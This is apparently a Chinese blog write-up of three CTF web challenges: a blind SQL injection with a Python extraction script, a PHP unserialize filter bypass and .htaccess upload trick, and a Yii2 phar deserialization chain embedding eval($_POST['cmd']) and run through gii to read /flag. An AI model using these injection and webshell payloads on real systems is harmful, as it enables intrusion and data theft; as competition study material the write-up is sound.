web

easysqli

扫描目录发现login.php

图片

User-Agent: universe PC

Accept: application/flag

注入点:index.php?id=

image

/index.php?id=1'%26%26if(ascii(substr((select%09database()),1,1))>0,1,0)--%09

# -*- coding: utf-8 -*-
# @Time : 2022/9/26 9:17
# @Author : pysnow
import requests
import re
# web2
# atable,flag,users
# 5.7.31
url = ''
url = "http://39.107.234.204:40957/index.php?id=1'%26%26if({},1,0)--\x09"
payload = "ascii(substr((select group_concat(a.2) from (select 1,2 union select * from users)a),{},1))>{}".replace(
    " ", '\x09')
result = ''
proxy = {"http": "127.0.0.1:8080"}
for i in range(1, 100):
    head = 27
    tail = 150
    while head < tail:
        mid = (head + tail) >> 1
        final = url.format(payload.format(i, mid))
        # print(final)
        r = requests.get(final)
        # print(r.text[2980:])
        if '星球名字' in r.text:
            head = mid + 1
        else:
            tail = mid
    result += chr(head)
    print(result)

通过这个注入得到数据

(自己替换空格)
表名:
select group_concat(table_name)from sys.schema_table_statistics_with_buffer where table_schema=database()
atable,flag,users

无列名注入:
select group_concat(a.2) from (select 1,2 union select * from users)a

flag表
数据:flag_is_in_login.php

users表
数据:
用户名:administrator
密码:oh_you_got_my_password

接着直接在login.php修改一下UA头和Accept头换成指定的关键词登陆就行了

图片(1)

upload

http://39.107.75.148:21106/index.php?source=1拿到源码

class Gethint{
    protected $value=0;

    public function __destruct(){
        echo $this->value;
        if($this->value==1)
            show_flag();
        else
            die('nonono');
    }

}
$hh=$_GET['hh'];
$hh=str_replace('Gethint', '', $hh);
unserialize($hh);
<?php

class Gethint{
    protected $value=1;

}

$final = serialize(new Gethint);
$final = str_replace('Gethint','GethGethintint',$final);
echo urlencode($final);

image-20220926173730936

9d7503608bf089e2ffb4fdb7ad1ccd23.php

image-20220926174453832

image-20220926174444368

过滤了php标签,而且又是php5.7以下,可以直接使用php 前端标签,这里我直接使用base64编码绕过

image-20220926174935341

AddType application/x-httpd-php .jpg
php_value auto_append_file php://filter/convert.base64-decode/resource=/var/www/html/upload/820097d390f6d5aa076fb0d1721b0aa4/1.jpg

image-20220926175048779

image-20220926175246873

codereview

yii2框架主控制器源码如下

<?php

namespace app\controllers;

use Yii;
use yii\filters\AccessControl;
use yii\web\BadRequestHttpException;
use yii\web\Controller;
use yii\web\ForbiddenHttpException;
use yii\web\Response;
use yii\web\UploadedFile;
use yii\filters\VerbFilter;
use app\models\LoginForm;
use app\models\ContactForm;
use app\models\UploadForm;

class SiteController extends Controller
{
    /**
     * {@inheritdoc}
     */
    public function behaviors()
    {
        return [
            'access' => [
                'class' => AccessControl::className(),
                'only' => ['logout'],
                'rules' => [
                    [
                        'actions' => ['logout'],
                        'allow' => true,
                        'roles' => ['@'],
                    ],
                ],
            ],
            'verbs' => [
                'class' => VerbFilter::className(),
                'actions' => [
                    'logout' => ['post'],
                ],
            ],
        ];
    }

    /**
     * {@inheritdoc}
     */
    public function actions()
    {
        return [
            'error' => [
                'class' => 'yii\web\ErrorAction',
            ],
            'captcha' => [
                'class' => 'yii\captcha\CaptchaAction',
                'fixedVerifyCode' => YII_ENV_TEST ? 'testme' : null,
            ],
        ];
    }

    /**
     * Displays homepage.
     *
     * @return string
     */
    public function actionIndex()
    {
        return $this->render('index');
    }

    /**
     * Login action.
     *
     * @return Response|string
     */
    public function actionLogin()
    {
        if (!Yii::$app->user->isGuest) {
            return $this->goHome();
        }

        $model = new LoginForm();
        if ($model->load(Yii::$app->request->post()) && $model->login()) {
            return $this->goBack();
        }

        $model->password = '';
        return $this->render('login', [
            'model' => $model,
        ]);
    }

    /**
     * Logout action.
     *
     * @return Response
     */
    public function actionLogout()
    {
        Yii::$app->user->logout();

        return $this->goHome();
    }
    /**
     * Displays about page.
     *
     * @return string
     */
    public function actionAbout()
    {
        return $this->render('about');
    }

    public function actionUpload()
    {
        $model = new UploadForm();

        if (Yii::$app->request->isPost) {
            $model->file = UploadedFile::getInstance($model, 'file');

            if ($model->file && $model->validate()) {
                $path = 'D:/phpstudy_pro/WWW/5space/uploads/' . $model->file->baseName . '.' . $model->file->extension;
                $model->file->saveAs($path);
                return $path;
            }else{
                return json_encode($model->errors);
            }
        }

        return $this->render('upload', ['model' => $model]);
    }
}

图片(2)

起了个环境,发现版本是2.0.45,网上没找到现成的链子,但是在upload 目录下给了phar 链子(好心的出题人uploads/phar.jpg),也有上传文件点,直接找触发点

O:41:"PhpOffice\PhpSpreadsheet\Shared\XMLWriter":1:{s:55:" PhpOffice\PhpSpreadsheet\Shared\XMLWriter tempFileName";O:28:"GuzzleHttp\Psr7\AppendStream":2:{s:37:" GuzzleHttp\Psr7\AppendStream streams";a:1:{i:0;O:29:"GuzzleHttp\Psr7\CachingStream":2:{s:43:" GuzzleHttp\Psr7\CachingStream remoteStream";O:22:"Faker\DefaultGenerator":1:{s:10:" * default";b:0;}s:6:"stream";O:26:"GuzzleHttp\Psr7\PumpStream":3:{s:34:" GuzzleHttp\Psr7\PumpStream source";C:32:"Opis\Closure\SerializableClosure":187:{a:5:{s:3:"use";a:0:{}s:8:"function";s:32:"function(){eval($_POST['cmd']);}";s:5:"scope";s:26:"GuzzleHttp\Psr7\PumpStream";s:4:"this";N;s:4:"self";s:32:"000000007a36b6140000000073ec9443";}}s:32:" GuzzleHttp\Psr7\PumpStream size";i:-10;s:34:" GuzzleHttp\Psr7\PumpStream buffer";O:22:"Faker\DefaultGenerator":1:{s:10:" * default";s:1:"j";}}}}s:38:" GuzzleHttp\Psr7\AppendStream seekable";b:1;}}

后面有空可以复现一下这个链子

这道题开了debug模式,用的是gii组件,访问:http://39.107.243.76:18517/index.php?r=gii 然后添加拓展

图片(3)

图片(4)

Generator[vendorName]=pysnow&Generator[packageName]=yii2-pysnow&Generator[namespace]=\pysnow\&Generator[type]=yii2-extension&Generator[keywords]=yii2,extension&Generator[license]=Apache-2.0&Generator[title]=pysnow&Generator[description]=pysnow&Generator[authorName]=pysnow&Generator[authorEmail]=pysnow@qq.com&Generator[outputPath]=phar:///tmp/phar.jpg&Generator[template]=default&preview=&cmd=system('cat /flag');

post传参cmd参数,然后RCE

最后修改:2022 年 09 月 26 日
如果觉得我的文章对你有用,请随意赞赏